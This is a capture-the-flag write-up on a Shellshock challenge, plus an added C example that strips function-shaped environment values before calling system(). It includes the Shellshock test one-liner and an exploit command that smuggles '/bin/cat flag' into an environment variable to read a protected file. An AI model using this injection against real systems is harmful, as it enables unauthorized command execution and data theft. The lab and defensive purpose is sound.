This challenge has a bash executable in the home directory, which the shellshock executable runs as follows:
system("/home/shellshock/bash -c 'echo shock_me'");
The bash binary is vulnerable to Shellshock, as the following command shows:
env x='() { :;}; echo vulnerable' ./bash -c 'echo hello'
Since the shellshock binary simply calls the bash binary, which inherits our environment, we can use the command below to print the flag:
env x='() { :;}; /bin/cat flag' ./shellshock
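On the defensive side, a wrapper that has to invoke a shell can drop function-shaped environment values before calling system(). The sketch below is an added example, not code from the challenge; the names looks_like_exported_function and scrub_env and the sample environment are hypothetical, and patching bash remains the actual fix.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if an environment value has the shape that vulnerable bash
 * versions import as a function definition: it starts with "() {".
 * Those versions keep parsing past the closing brace and execute
 * whatever commands follow it. */
int looks_like_exported_function(const char *value)
{
    return value != NULL && strncmp(value, "() {", 4) == 0;
}

/* Filters a NULL-terminated "NAME=value" array in place, dropping every
 * entry whose value looks like an exported function.
 * Returns the number of entries removed. */
int scrub_env(char **envp)
{
    int removed = 0;
    char **out = envp;
    for (char **in = envp; *in != NULL; in++) {
        const char *eq = strchr(*in, '=');
        if (eq != NULL && looks_like_exported_function(eq + 1)) {
            removed++;
            continue;               /* skip the suspicious entry */
        }
        *out++ = *in;               /* keep everything else, in order */
    }
    *out = NULL;
    return removed;
}

int main(void)
{
    /* Constructed sample environment, not taken from the challenge host. */
    char *sample[] = {
        "PATH=/usr/bin:/bin",
        "x=() { :;}; echo vulnerable",
        "HOME=/home/shellshock",
        NULL
    };
    int n = scrub_env(sample);
    printf("removed %d entries\n", n);
    for (char **p = sample; *p != NULL; p++)
        puts(*p);
    /* A real wrapper would run scrub_env on its own environ (or clear
     * the environment entirely) before calling system(). */
    return 0;
}
```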